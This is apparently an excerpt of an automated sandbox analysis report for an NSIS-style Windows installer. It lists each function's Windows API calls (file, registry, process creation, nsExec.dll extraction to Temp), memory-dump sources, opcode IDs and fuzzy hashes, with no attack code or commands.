                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                              • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                              • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                              • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                              Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                              Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                                              • Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
                                                              • Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
                                                              • Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D
                                                              Function 004063F2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                                              Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                              Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                              Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                                              Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                                              • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                                              • Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                                              • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                              Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                              • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                              • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                              • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                              Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 00405B8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID:
                                                              • API String ID: 587946157-0
                                                              • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                              • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                              • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                              • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                              Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                              • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                              • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                              • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                              Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                              Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                              • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                              • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                              • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                              Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
